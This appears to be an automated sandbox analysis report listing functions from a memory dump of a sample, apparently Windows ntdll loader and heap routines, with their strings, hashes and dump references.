                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 3af3174013d575846483d41f75fe731c80fbe1d8cb46b51ee175860f22e8e24b
                                          • Instruction ID: a13b8f6bbca77a621895f73bb6643e99dc87b845b9cfc5471e6c6d3780251727
                                          • Opcode Fuzzy Hash: 3af3174013d575846483d41f75fe731c80fbe1d8cb46b51ee175860f22e8e24b
                                          • Instruction Fuzzy Hash: 86513374B00781DBE711CB6CC9A4B2A7BE6BF04774F510AA8E9529F6E1DB74E900CB41
                                          Function 3779D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3779D7B2
                                          • HEAP: , xrefs: 3779D79F
                                          • HEAP[%wZ]: , xrefs: 3779D792
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                          • API String ID: 0-3815128232
                                          • Opcode ID: 0092156801e0b2794d84c3f49a27a3880132cd30b3b48621fb3dcf7ae58adb81
                                          • Instruction ID: 9157242ab6f3289783242f7cd574d21e65fc33d6fb2dfb13b4e86025a03a9dda
                                          • Opcode Fuzzy Hash: 0092156801e0b2794d84c3f49a27a3880132cd30b3b48621fb3dcf7ae58adb81
                                          • Instruction Fuzzy Hash: BC5124791027508AF320CE29E8547F273E2DB473E8F514CADE4C5AF581E62AE847DB61
                                          Function 376E753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 8d85d71d4d38016b7321b0c8c9389a46ccffe80f8c848d333d57cc3e6d490245
                                          • Instruction ID: 3d15575350158e0bf677d8da5de6a277972f2ff5547092ce6d6306537436266e
                                          • Opcode Fuzzy Hash: 8d85d71d4d38016b7321b0c8c9389a46ccffe80f8c848d333d57cc3e6d490245
                                          • Instruction Fuzzy Hash: B84155782023808FEF14CA28C5E1B7577E99F01368F6548ADD4858FE5ACE24E856CF32
                                          Function 377215EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 37761954
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37761943
                                          • LdrpAllocateTls, xrefs: 3776194A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: ec51d98b3abf1427176badd4a588200d72f57ef580101d0028d8b3d5b95bddac
                                          • Instruction ID: 836a255fb380f03887631ac5831ebd50608ab052bb4b3a7abba35de8ada97cbb
                                          • Opcode Fuzzy Hash: ec51d98b3abf1427176badd4a588200d72f57ef580101d0028d8b3d5b95bddac
                                          • Instruction Fuzzy Hash: B84188B5A00205EFDB04CFA9CC55BAEBBF2FF48314F008529E815AB611DB39A811CF91
                                          Function 3777B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 3777B2F0
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3777B2B2
                                          • GlobalFlag, xrefs: 3777B30F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: aaac002d165d0531259b16ec9372bac9fb2c206d9c0e624ce09ed8cba0dda00d
                                          • Instruction ID: d7c4dbeb1d6419954923c60ada62cc2f95f4a847a457553e0036a9bec5dcbf8b
                                          • Opcode Fuzzy Hash: aaac002d165d0531259b16ec9372bac9fb2c206d9c0e624ce09ed8cba0dda00d
                                          • Instruction Fuzzy Hash: 4D315CB590124DAFDB00DF94CC98BEEBBBDEF44754F400869EA05AB251D7389A44CFA1
                                          Function 37721527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 3776185B
                                          • DLL "%wZ" has TLS information at %p, xrefs: 3776184A
                                          • LdrpInitializeTls, xrefs: 37761851
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 155d4d729528607d72906e0de49a2a20d6802afb34af129e6869925b4fa38d97
                                          • Instruction ID: fbf5ec8c44814da8a521cc0436b56b1ac1873021a7463228b0696e69c29f7426
                                          • Opcode Fuzzy Hash: 155d4d729528607d72906e0de49a2a20d6802afb34af129e6869925b4fa38d97
                                          • Instruction Fuzzy Hash: 76314871B10305BFE710CB4ECC99F5A73A9BB447A4F0100A9E511BF5A0EB74ED5197A1
                                          Function 377785AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 377785DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 0f7c9a40d5ba2dfd7b0520edcc6642998982a93109d2a0b765fa2ab4e598d64b
                                          • Instruction ID: 21e2c4eb7cc0674c363025d70fb2d9d11ccf9c209e60a3134733aee5ed5c87d4
                                          • Opcode Fuzzy Hash: 0f7c9a40d5ba2dfd7b0520edcc6642998982a93109d2a0b765fa2ab4e598d64b
                                          • Instruction Fuzzy Hash: A9012676600284BBDF205A11DC48F7A7B6FEF402A8F441868E501DF863CB24BC55EE9B
                                          Function 376F5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 42ee7c42e4f321d3516d9da198926f9644b69e3cfb6ef1e10a1d4de47f2a8d51
                                          • Instruction ID: 37a747a9b9e52832dc62f8121518b3131e9e0e63d3b2b295a2c7cb05daa4d9df
                                          • Opcode Fuzzy Hash: 42ee7c42e4f321d3516d9da198926f9644b69e3cfb6ef1e10a1d4de47f2a8d51
                                          • Instruction Fuzzy Hash: 8131D035301B06BFE7419B24C960B9AFBA6FF48764F001119E9119BA61DB75EC21CF81
                                          Function 37779567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 1d889e889c69fc0fcf439eece85650dd57e4a6a6e92e9ff91822a0b15dacf7c4
                                          • Instruction ID: 3d98146d327c40449c435acc621e6e616bcd3271484e5cddd3daa8c9875d80f0
                                          • Opcode Fuzzy Hash: 1d889e889c69fc0fcf439eece85650dd57e4a6a6e92e9ff91822a0b15dacf7c4
                                          • Instruction Fuzzy Hash: 1311E772B142A5AFEF058B5CC985A7EB7BAEF48260F11017DE405EB350DA749D01CF94
                                          Function 3777174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$AddD
                                          • API String ID: 0-2525844869
                                          • Opcode ID: 064b6156d0ac51f543a71f3a39b8090e563de06f3b2305ba7dc2a8e2f668fafe
                                          • Instruction ID: 158ea9430bc42f89c9b1fd986edbe7bbe600571fc0af5cc67781fa0886d27c2b
                                          • Opcode Fuzzy Hash: 064b6156d0ac51f543a71f3a39b8090e563de06f3b2305ba7dc2a8e2f668fafe
                                          • Instruction Fuzzy Hash: 4FA16D76508384AFE715CB14C845BBBB7EAFFC4714F504A2EF9948A250E770E905CBA2
                                          Function 3776E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 933d98d7149b8b976cceb267e59d3640bbf7fd08a5b9e5a4a2c5af0ecd599435
                                          • Instruction ID: ae600ef62524cc28cfe344a0787437ca6b4992627d96e9bcb5a68e83dcf7a1da
                                          • Opcode Fuzzy Hash: 933d98d7149b8b976cceb267e59d3640bbf7fd08a5b9e5a4a2c5af0ecd599435
                                          • Instruction Fuzzy Hash: 6B615DB1A103099FDB15CFA8C844BADBBB5FB44754F50442EE949EF256EB70E900CB60
                                          Function 377CB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 377CB5C4
                                          • RedirectedKey, xrefs: 377CB60E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                          • API String ID: 0-1388552009
                                          • Opcode ID: 1630c9d8fb179a4b9aa426335ffefe5fd49e507a8932d523faad3884853582d3
                                          • Instruction ID: 5abd1d16b4631bd060daba5f63fbcc777191fd9f0ab55bbe3193f8bd24134f5b
                                          • Opcode Fuzzy Hash: 1630c9d8fb179a4b9aa426335ffefe5fd49e507a8932d523faad3884853582d3
                                          • Instruction Fuzzy Hash: 5B61F3B5C4021AEBDF11CF94C989ADEBBB9FF48714F50406AF805AB210D7349A46DFA1
                                          Function 3770F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$
                                          • API String ID: 3446177414-233714265
                                          • Opcode ID: a2f7a6a276f64ab8b613a4f4f1c7913a470a1338dd2a5a5c7d3fbf3ee7776371
                                          • Instruction ID: ff7922563d2006748604c307e25298e3c9cca7ddd00954d306c70727f82e70ec
                                          • Opcode Fuzzy Hash: a2f7a6a276f64ab8b613a4f4f1c7913a470a1338dd2a5a5c7d3fbf3ee7776371
                                          • Instruction Fuzzy Hash: 3061BC75A00749CFEB20CFA4C588BADB7F2BF44714F504469E115AF690CB79A942CF92
                                          Function 3778314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: e40ecd6209523e9299839f34d83fbeb688b975f7b694737961b6180109fc2f68
                                          • Instruction ID: cda962ba250c5452da84ead467f21155fcabb4bdc49f3cb9cdd2415f90df83ab
                                          • Opcode Fuzzy Hash: e40ecd6209523e9299839f34d83fbeb688b975f7b694737961b6180109fc2f68
                                          • Instruction Fuzzy Hash: D731EF75209741ABE301CF68D855B2AB7E5EF89B20F000C69F858CF391EB74E905CB92
                                          Function 376F06CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: n7$ n7
                                          • API String ID: 0-2002223982
                                          • Opcode ID: b06c393daf1f9582c2204e7cecc9b42699eec03cedfd3ab1ddcb1c5624178e99
                                          • Instruction ID: e45c260aa124cdd6ab2ed8a93eae9496f3737763874ab4a1d7d79b103453c4d4
                                          • Opcode Fuzzy Hash: b06c393daf1f9582c2204e7cecc9b42699eec03cedfd3ab1ddcb1c5624178e99
                                          • Instruction Fuzzy Hash: 1431F536604B099BD711DE24C8A0E7BB7EAEFC46A0F0145A9FC159B310EB35DC158FA2
                                          Function 377233D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3776289F
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3776289A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 13b226e3c0180edffaf2abb3ce81d2be8a3ba0093b42ff5949d9f816bf0c9e06
                                          • Instruction ID: 3a2bf556ec81b744f4d82e4d872e08b4e6bc29ac21536f2bfc86a0cd638acdf1
                                          • Opcode Fuzzy Hash: 13b226e3c0180edffaf2abb3ce81d2be8a3ba0093b42ff5949d9f816bf0c9e06
                                          • Instruction Fuzzy Hash: 6B1129B2B04305BFE7158A48CC45F6B76A9DB88B64F60847EFD04EF244DA78DD0096A1
                                          Function 3772A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 4fb5ff62f723e55793be282f2fc7648ae6c40ffc52df1155a7765998d179c275
                                          • Instruction ID: 28603bac31ac96e0e793ce281753b5b925f3f4f4c0193e9a75ea9c06e2ee409a
                                          • Opcode Fuzzy Hash: 4fb5ff62f723e55793be282f2fc7648ae6c40ffc52df1155a7765998d179c275
                                          • Instruction Fuzzy Hash: 6601D1B2260740AFE311CF24CD45B1277F8EB40B19F018979F968CB991E738E914DB46
                                          Function 376FC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: ab3314c0d7202f72601dd1029335dca8b11d48a457ef8ed23853c50d10bc47b5
                                          • Instruction ID: ae9cc72a742e54290cb497e974b637b65b717b3f50d04a909b10148d34abc27b
                                          • Opcode Fuzzy Hash: ab3314c0d7202f72601dd1029335dca8b11d48a457ef8ed23853c50d10bc47b5
                                          • Instruction Fuzzy Hash: 14826C79E003098FEB14CFA9C8A0BADB7B1FF49360F108169D819AB251DB36AD45CF51
                                          Function 376F64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd173c36fbb799b5fab263736421dd65c60e27c037517bd45252c39f81efdad8
                                          • Instruction ID: f100d6b08841c93bf0c5b8d05270ab18ae4d0fd2e6b5db8c4dde101ca558a1c1
                                          • Opcode Fuzzy Hash: cd173c36fbb799b5fab263736421dd65c60e27c037517bd45252c39f81efdad8
                                          • Instruction Fuzzy Hash: 24E16975609341CFD704CF28C4A0B5ABBF1BF89364F048A6DE8999B351DB32E905CB92
                                          Function 3771E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 668a328ee5aeff8867c8413f5b0f284c8e8776322d2e6aca2d5eda6af852007b
                                          • Instruction ID: 8d176987a22d9a1068a19b2aa3dfe3ce92842fadb75b612ddb8db14538f8ac0e
                                          • Opcode Fuzzy Hash: 668a328ee5aeff8867c8413f5b0f284c8e8776322d2e6aca2d5eda6af852007b
                                          • Instruction Fuzzy Hash: B5A1F571E10714EFEB11CBA4C848BAE77A6AF05778F010525E910BF290DBB8A945CBC2
                                          Function 377755E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87ca8f37e5510d4672a7f5399898777eb79257c8e09f17eb7fd440cde666cdc4
                                          • Instruction ID: 2e8cb15b47cf3197e9b7cbb252069ab61eb8f586ed324505903b17e83855b6f7
                                          • Opcode Fuzzy Hash: 87ca8f37e5510d4672a7f5399898777eb79257c8e09f17eb7fd440cde666cdc4
                                          • Instruction Fuzzy Hash: 8F815E75A00345ABEB11DFA5CC84EAFBBF8EF48760F100529E515AF291DB74EA00DB91
                                          Function 376F254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 669cd55b0248ae5eb228f0ff7dace6160129649eea9bc51904467db7f4bd8aed
                                          • Instruction ID: 270bcad994e85ae5050138bacfe1bbda0b20bc4f9e389c3f5298241bf3332f0d
                                          • Opcode Fuzzy Hash: 669cd55b0248ae5eb228f0ff7dace6160129649eea9bc51904467db7f4bd8aed
                                          • Instruction Fuzzy Hash: F8416AB5501704CFD725CF24C960B5DB7F6BF45364F1486AAD006AB6A0EB36A941CF42
                                          Function 376F4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: de42b70a28e06c36d889a7de9797e6e9d4678fcdeec7dcbd43a6dbf630e7a48a
                                          • Instruction ID: 2d549b8af95d3147ba53c575e5aeca59bf77b671c9a79d629cdc344cf4f81759
                                          • Opcode Fuzzy Hash: de42b70a28e06c36d889a7de9797e6e9d4678fcdeec7dcbd43a6dbf630e7a48a
                                          • Instruction Fuzzy Hash: 1041F5756183418FD714CF28C8A4B2ABFE9FF81364F10442DE5518B6A1DB36E951CB92
                                          Function 376EB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 0c41dcc6596f678521fbf24370488e2562abc5018db3472185a161f3e5967a76
                                          • Instruction ID: 493a8344a45039d302c988ef9b63edecc883da4cd286c9e1c7d82cca0980277f
                                          • Opcode Fuzzy Hash: 0c41dcc6596f678521fbf24370488e2562abc5018db3472185a161f3e5967a76
                                          • Instruction Fuzzy Hash: C9312F72102208DFC711CF24C990E6A77A9EF44364F10426DE9089F6A5CB31ED06CFE2
